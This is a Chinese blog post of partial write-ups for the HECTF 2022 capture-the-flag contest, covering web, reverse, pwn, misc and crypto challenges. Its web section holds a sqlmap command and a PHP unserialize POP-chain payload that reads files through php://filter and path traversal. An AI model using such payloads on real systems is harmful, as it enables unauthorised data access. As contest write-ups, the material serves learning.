2022HECTF部分WP

已于 2022-11-07 22:47:00 修改
阅读量698 收藏 1
点赞数
分类专栏: WP 文章标签: php 开发语言
于 2022-11-07 22:45:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_63928796/article/details/127727584
版权

WEB

迷路的小狮

扫描目录找到找到/.htases目录提示访问之后,看路由去1目录提示hebnu,之后让用post方式,返回后是乱码可以用谷歌插件

 之后改referer头

 

擎天注

python3 sqlmap.py -u http://url/?id=1 --dbs -batch  

flag在ctf库下的3eDf4f07efC9ee16表下flag字段

easy_unserialize 

poc

<?php

class A{
    public $file;

}

class B{
    public $str;
    public $huang;

}

class C{
    public $eee;
    public $aaa;
    public $ccc;

}

class D{
    public $ddd;
    public $ext;



}

$gagaga  = new A();
        $gagaga->file=new B();
        $gagaga->file->str =new C();
        $gagaga->file-> str -> eee = new B();
        $gagaga->file-> str -> eee -> huang = new C();
        $gagaga->file-> str -> eee -> huang ->ccc = new D();
        $gagaga->file-> str -> eee -> huang ->ccc ->ddd ="SplFileObject";
        $gagaga->file-> str -> eee -> huang ->ccc ->ext ="php://filter/read=convert.base64-encode/resource=../../../ffflllllaaaaaaggggg.txt";

        echo (serialize($gagaga));

分析:

unserialize会调用wakeup ,wakeup里有isset,会调用B.__isset会执行echo,调用C.toString会调用flag(),flag()方法不存在会调用B.__call,retrun str属性 属性不存在调用C.__get(),function()类当做方法使用会调用__invoke(),invoke里边 是echo new $a($b)的形式 ,可以触发反序列化原生类

用上边的查目录 路径应该是../../../f*

然后出来ffffffllllllag.txt用SplFileObject+伪协议读取

SEVDVEZ7dV9maW5kX20NCnlfdHJ1bHlzZWxmfQ==

base64解码得到flag

RE

apk

包上HECTF{}即可 

贝斯

 字符串中可以看到base32的码表以及加密函数

按照逻辑

将P0w3r中的值 取反后输出,解base32

#include<stdio.h>

        int main(){
        unsigned char P0w3r[] =
        {
        0xB5, 0xBD, 0xBC, 0xAA, 0xB8, 0xA9, 0xBC, 0xB8, 0xAF, 0xB1,
        0xBA, 0xAA, 0xB8, 0xCA, 0xB3, 0xAC, 0xB0, 0xB2, 0xA5, 0xAA,
        0xCD, 0xC9, 0xB4, 0xAB, 0xB0, 0xAD, 0xAE, 0xA7, 0xBA, 0xCB,
        0xA5, 0xAD, 0xB1, 0xA5, 0xBD, 0xB8, 0xAC, 0xCA, 0xBB, 0xAA,
        0xB8, 0xB1, 0xA5, 0xBA, 0xB0, 0xCB, 0xAB, 0xB5, 0xB8, 0xB1,
        0xAB, 0xBC, 0xB2, 0xA9, 0xA5, 0xAE, 0xB8, 0xB1, 0xC9, 0xAE
        };
        int i;
        for(i=0;i<strlen(P0w3r);i++){
        printf("%c",~P0w3r[i]);
        }
        }

base32解密 

HelloIos

只是个异或0x1f后+1

flag2 = "X[]LZeX{ttqAwqmc"
        for i,v in enumerate(flag2):
        print(chr((ord(v)^0x1f)+1),end='')

author'sB0x

主要逻辑在EzEncryptText中

%256 经典rc4算法

从Cry提取数组

密钥Key 

跑脚本解

def rc4_main(key = "init_key", plain = "init_message"): #主函数
    s_box = rc4_init_sbox(key)
    crypt = rc4_excrypt(plain, s_box)
    return crypt
    
def rc4_init_sbox(key):         #初始化sbox
    s_box = list(range(256)) 
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    return s_box
    
def rc4_excrypt(plain, box):    #rc4解密
    res = []
    i = j = 0
    for s in plain:
        if s <= 0:
            s = s + 256
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(s ^ k))
    cipher = "".join(res)
    print("解密后的字符串是:   %s" %cipher)
    return  cipher

if __name__ == '__main__':
    print("此脚本仅用于对于数组的RC4解密\n")
    # 这里输入数组
    data = [  0xC3, 0xF5, 0xE5, 0xE2, 0xEC, 0x17, 0xE5, 0x2A, 0xCA, 0x03, 
  0xB6, 0xFD, 0xC1, 0xBC, 0x70, 0x44, 0x10, 0xCD, 0xA6, 0x13, 
  0x0B, 0x9A, 0x73, 0x06, 0x0E, 0x4D, 0xDE, 0x95, 0x12, 0x9C, 
  0xD9, 0x46]
    key = "thisiskey"
    rc4_main(key, data)

run

  先查壳,发现upx壳

准备upx-d脱壳可是没脱掉,应该是被魔改了,直接上脱壳机

查看主要加密函数

分析可得,这是个8*8*8的迷宫,+1 -1为左右移动,+8 -8为上下移动,+64 -64为前后移动

输入u会执行init函数初始化地图,所以输入31个u,定好断点,动调获取地图

获得地图,编写exp

#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int check_s[200];
int m[10][8][8] ={
        {0,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1},
        {1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1},
        {1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,0,1,1,1,0,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1},
        {1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1},
        {1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1},
        {1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1,1,1,1,1,0,0,1},
        {1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1},
        {1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0}
};
int dx[]={0,0,1,-1,0,0};
int dy[]={0,0,0,0,1,-1};
int dz[]={1,-1,0,0,0,0};
int dis[10][10][10];
char ccc[]={'u','n','s','w','d','a'}; 
char flag[900];
int len;
void dfs(int x,int y, int z,int k){
        if(x==7&&y==7&&z==7){
                for(int i=0;i<len;i++)
                        cout<<flag[i];
                cout<<"\n";
        }
        dis[z][x][y]=k;
        for(int i=0;i<6;i++){
                int tx=x+dx[i];
                int ty=y+dy[i];
                int tz=z+dz[i];
                if(tx<0||ty<0||tz<0||tx>7||ty>7||tz>7) continue;
                if(m[tz][tx][ty]||dis[tz][tx][ty]<=k+1) continue;
                flag[len++]=ccc[i];
                dfs(tx,ty,tz,k+1);
                len--;
        }
}
int main(){
        memset(dis,10,sizeof(dis));
        dfs(0,0,0,0);
}
//ssddssuuwwddndduuussdussasauudd

PWN 

真.签到

整数溢出

#include<stdio.h>

int main(){
        int v4;
        unsigned int v1;
        for (v1=0;v1<800;v1++)
        {
                v4 = v1;
                if ( (char)v4 < -125 && v4 > 255 )
                printf("%d\n",v4);
        }
        
}

不想算,爆破一下

输哪个都行,然后发现没有flag

在.flag里

MISC 

咦~小鲨鱼来喽

把http流导出来,看到最后⼀个发现flag

舞者的秘密  

不知道压缩包密码,先爆破⼀下⼀般都是4-8位出数字

gif⼀帧⼀帧查看

HECTF{LuckForYou}

你把我flag藏哪去了?  

分为两段
Docx我开了始终显⽰隐藏⽂字,所以直接就看到了

 

解base64得到⼀堆英⽂字符
另外⼀半是0宽 拼起来后进⾏词频统计

flag{kpomijnhuybrvdxezswq}

来捉迷藏啊 

rgb0段有明显lsb隐写特征
导出数据 进⾏xor爆破
发现异或0x33的时候,为PK头

导出后解压zip 打开doc

⽂件尾有⽩⾊字符 为flag

没⼤没⼩的⿎励 

搜索 当队友需要⿎励的话,我会笑着对他说:
发现拼⾳wocenimenma的⻓度为11,正好符合提⽰的11个?穷举所有⼤⼩写组合爆破,得到密码

提⽰74748183键盘密码sstv,⽤sstv解,得到base64的字符串

base64解密得到b8d55688410af102549de756eb3da854
somd5解密得到litangdj
HECTF{litangdj}

我的⼿要不⾏辣 

压缩包解压得到png,补上png头四位
ocr识别字符后16进制保存成压缩包
爆破密码

千千秀字⾳符解密

2022HECTF调查问卷

填写问卷得到flag

CRYPTO

流动的⾳符

⾳符解密

第⼀个加3为H,第⼆个+4为E,第⼆个+4为E

flag1 = [69,65,62,78,63,115,58,87,90,103,84,100,80,89,98,77,83,97,89,103]
for i,v in enumerate(flag1):
  print(chr(i+v+3),end='')

 Matrix

打开附件可以看到flag

Ezrsa

p = libnum.gcd(p_,n)
q = libnum.gcd(q_,n)
然后e phi_n不互素 
import libnum
import gmpy2
from Crypto.Util.number import *

p_= 10660749010264526666955869622200514149424664070021154725214604278423033834800955315638637946982741577976025615843487738805576629855459529381681679497064453109727962183277768658053394103348827822686515016677449953958986089293779870089604784750116267441026319440135025236091029928565442799040007751858012409498271852333017388486644053877238274838173771344350870565886676055860728949042361028753924290647753862707042472944714140635484722345522648010064713004854479094986010632316750770118044301903260988074471243247031854872785324506292730778884664223412372663828159205320038546293395502275887356885181013870536857351801
q_= 24900409366873586425973971191854411152048453357438215578406168704445779543895031579176888535442469919297663892450230816720758414920791049333275007446412352293152157437672026001378469357187698312455020558413101033543700131403373834030395855212901673914686297701313223697181049265286011127188695284002470629178098454764536315245968458622929902214839704674718996340182311301099900271312644919770585429288043854743210617868761990329037081770477261306489047429460937057125193231432195877922731165870197358946683698077175950756482605399815830687563398277515452842563143685190688865084064679712177247354049377034394880941369
c= 946358882688806235743551077996671406469185038565566907261383734984318844703303437873183869084536703835433988817350857866089668970925835657856975155167500190428922521871327955274363186305180350899397478897928581580727458938934640786146518171503388507311655160765881370401217708135845031083189007308497775864484758699096082815479602777639307812516934937183952478316508418895341680335172973583094238147073379957772209947376051520041093030641369536800448737539973770258342422560893630082723217759837690008955748444973711508371077927468399703456466637348191192859278206925769696645636969358967735037470196395844215361527039288120664704552775460536654859848091685928057224735031528303041212702445718384890182474053295656578327780048497422707815820736647212902522526653039676698263673166412650104420869762547385554961873764933774143297622712766521201037469301912471740996998228799841957283759679784569638149555093498363791420486340
n= 1677924010415009671349677258549532467848510897335579570922114838282842960143799964694977371357046837674443739542407516581076865550606801686170400793463690366665534118961173768008603133641864003317727610676872685077700753537755254540591236871020140458419596610210236431401477173114522177145982007059709616618279936170223104755776796458682957656555154039384483954754660803554302451221585280396378564648495919069459351016010016636012245082009946238467068412198769348889950331295680906811430325690102055808865038151762131291269197341984605959088829226733422023970618165958725486675321766767430347929319621215891165857544847088373700410007500868721335483070938971597851859953792409442485301373327127595552457801719192824050415833073999094005750868115932130442747899994421453654008731830580286370350900523295205445599466666709544075950517531382971246869745425091317996973135364990272852701046046315136273893166361180330563013617843

e = 114
p = libnum.gcd(p_,n)
q = libnum.gcd(q_,n)

t = n//p//q

phi_n=(p-1)*(q-1)*(t-1)

e = 114
r = t

n=p*q*r
phi=(p-1)*(q-1)*(r-1)
t=gmpy2.gcd(e,phi)
d=gmpy2.invert(e//t,phi)
m=pow(c,d,n)
msg=gmpy2.iroot(m,t)
if msg[1]:
    print(long_to_bytes(msg[0]))

HECTF 2022
weixin_57449426的博客
11-07 675
师傅们都tql
HECTF2020web部分wp
weixin_46330722的博客
11-25 1817
HECTF签到ezphpssrfmexiazhu 这两周太忙了,考试和实验都堆在一起了,人没了。上周末抽空做了一下HECTF,签到关机一气呵成。 签到 点一下忘记密码 然后就输入手机号,并输入四位验证码。手机号可以在登陆界面的注释中找到,这里说是四位数验证码,那就应该是爆破了。菜鸡的脚本附上 import requests url1='http://121.196.32.184:8080/findpass.php?num=15970773575&check=' url2='&next=%E
HECTF2022 Crypto WP
qq_73824585的博客
11-07 331
速速来看HECTF2022密码题解
HECTF2022
mumuzi的博客
11-08 4092
今年是第三次参加HECTF,成绩不是很好wp随便看看就好了 文章目录Misc咦~小鲨鱼来喽舞者的秘密你把我flag藏哪去了?来玩捉迷藏呀我的手要不行辣2022HECTF调查问卷Crypto流动的音符matrixezrsamixtureReverseapk贝斯helloiosrunWeb迷路的小狮擎天注Pwn真·签到 Misc 咦~小鲨鱼来喽 直接打开流量包翻tcp流量即可 HECTF{i0hate0flow0analysis896} 舞者的秘密 直接爆破压缩包得到密码为456123,接着用GIFFram
HECTF 部分wp
Sentiment的博客
11-15 4527
Web EDGnb(签到) docker run -it moth404/edgnb 执行后发现有很多flag,但都是空的,推测flag应该不在容器内部 查看docker history,容器构建记录 docker history moth404/edgnb 发现flag但是显示不全 用 --no-trunc=true进行不截断输出,看到flag docker history moth404/edgnb --no-trunc=true 或者可以在dockerhub上直接看记录 mmmmd5d5d
HECTF部分WP
星|Donstpast
01-09 522
本次比赛成绩还算勉强看的过去吧,不是很拉胯。经历了大师傅们最后的冲分以及分比重的调整,最终停在了24的位置,这里写一下做出来的题目的WP。 MISC 1.png 下载题目,是一张小猫猫。 多年杂项手的经验告诉我,这个图片必然改高度。用010editor打开, 为了方便直接修改个大点的高度, 获得了其中一半的flag。此时闲来无事,将内容往下拖,在文本内容的最后发现了熟悉的base64. 在线base64解密,获得后半部分。 flag:flag{94ed7fdae8f504743b79bdf8fcfd55f
一周刷题记录 | Web&Misc
Lemon's blog
12-03 1227
文章目录前言 前言 前端时间太忙了,现在终于有空可以安心做做题,减小与大师傅们的差距,冲冲冲!
wp】2023第七届HECTF信息安全挑战赛 Web
最新发布
m0_63138919的博客
11-19 828
本文为【wp】2023第七届HECTF信息安全挑战赛 Web
[HECTF 2022]—Web WirteUp
Sentiment的博客
11-08 827
HECTF 2022
HECTF2022 学习笔记
一颗小白菜的博客
11-15 413
将图片格式改为gif,发现动图中有字符,通过Gifsplitter分离每一帧,找出里面的字符拼接在一起就是flag。先爆破出压缩包密码,用010打开,发现文件开头是gif的格式。用vim打开otherflag.txt,发现是零宽度隐写。可能为隐藏文字,通过文件->选项->显示,勾选隐藏文字。结束语:太菜了,就会做一点点简单的,还要多加学习!查看最后面的http数据包,发现flag。base64解密后,得到一串无规律字符。将两部分字符串合在一起,通过。网站解密得到另一串字符。
[wp] HECTF2019 让我们一起来变魔术吧
MercyLin的博客
11-05 1360
<?php class Read { public $var; public $token; public $token_flag; public function __construct() { $this->token_flag = $this->token = md5(rand(1,10000)); } pub...
HNCTF 2022-WEB部分wp
m0_74606212的博客
10-30 365
HNCTF 2022-WEB部分wp
hectf2020部分简单题题解wp
J1ayの博客
11-25 728
HECTF 我真是又菜又没时间肝题。。又又又只水了波简单题。。。 ⭐Reverse 1、Hello_Re file查一波 32bit,拖进IDA中 老规矩shift+F12 查看字符串: 跳转 F5查看 scanf("%s", &v4); if ( strlen(&v4) == 25 && judge0(&v4, 26) ) puts("Congratulations! You found the flag!"); 双击 judge0 进
RORCTF2020 部分wp
会下雪的晴天
12-12 602
跟着太空人师傅一队,被带飞,spaceman太强辣!最终取得总积分26名,也得奖了很开心,只是现在还没说奖励是啥哈哈哈,放张图纪念一下嘿嘿 目录MISCFMWEBezsql你能登陆吗&你能登陆吗2Calc MISC FM Ubuntu下载gqrx,然后载入iq文件,将Filter width改为WFM(mono)接着start,去听声音,读出来的数字+字母即为flag WEB ezsql MySql8新版特性,使用tqble代替select 多谢M3师傅提醒 补:pass注入select .
2022年强网杯rcefile wp
weixin_52829570的博客
08-01 1286
查看源码中config.inc.php,发现对cookie做了反序列化,并存在spl_autoload_register()函数。所以上传一个phar文件,并把Content-Type改成image/png。常见的大小写绕过,空格绕过,php4这种都可以绕过成功上传,但都不解析。cookie的userfile就是上传文件加密过的文件名来构造序列化。知道了flag的位置所以我们重新上传一个catflag的inc文件。带着构造的cookie进行访问可以看到代码被执行了。O32"文件名"0{}...
CTF | CTF-Web 捉迷藏
qq_42646885的博客
07-10 2260
打开网址,看到如下页面。 先查看源代码,发现页面还有一个表格和一个链接。 在样式将背景颜色改为红色后看到页面如下: 点击index链接,发现页面闪现出了绿色的字符,随机一闪而逝,好像看到了flag信息。尝试用burpsuite抓包,看下Index.php页面的信息。 burpsuite端口已默认设置好。 设置firefox浏览器的网络端口。firefox浏览器:选项-高级...
CTF i春秋从0刷题 MISC
XY_4
07-13 2534
1、 分值:20分类型:MiscStego题目名称:A 题目是一个.cap文件。根据提示和wireshark分析一下需要查dns。扔到kali里爆破密码。过程不赘述,直接上截图。 这里看题目分值应该是纯数字,所以找了个纯数字字典很快就出来了。 得到dec。dns过滤。 这里居然不是第一个google。提示却是第一个网站。辣鸡提示! ...
捉迷藏--
qq_45832461的博客
07-20 347
捉迷藏 题目描述 核心思路 最小路径点覆盖:选择一些路径,覆盖所有点,并且各个路径的节点之间不能有交集,要求路径数最少 最小路径重复点覆盖:选择一些路径,覆盖所有点,但是各个路径的节点之间允许有交集,要求路径数最少 求解最小路径点覆盖的方法: 结论:DAG的最小路径点覆盖=原图节点数-拆点后形成的二分图的最大匹配数 证明: 这里使用的技巧是拆点。假设原图有nnn个节点,将每个节点都复制一份放到右边,假设节点iii复制后的点为i′i'i′,我们将原图中的边(i,j)(i,j)(i,j)转变为新图中的(i
HECTF2021 WP部分
weixin_49764009的博客
11-17 2337
crypto RSA_e_n 维纳攻击 from RSAwienerHacker import hack_RSA import binascii,gmpy2 e=0x14b367bf01efd4dc667b8e62975479c612c96e78f7f1f55242b2973c882ddcb33a65c52174d8ae1273764ce429054ea3f2fdc38ff205443c92ef4198739f05aa11fc10d3fc6ff30c8f5f05a04f43e3d8fc9bfffe916b2
2022最新版WP Ultimo插件及附加组件下载
资源摘要信息:"这份资源包含了最新的2022年版WordPress插件WP Ultimo v2.0.10的完整功能演示demo以及未修改版本的插件文件和附加组件。WP Ultimo是一个强大的工具,专门用于创建和管理高级的WordPress网络环境。" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值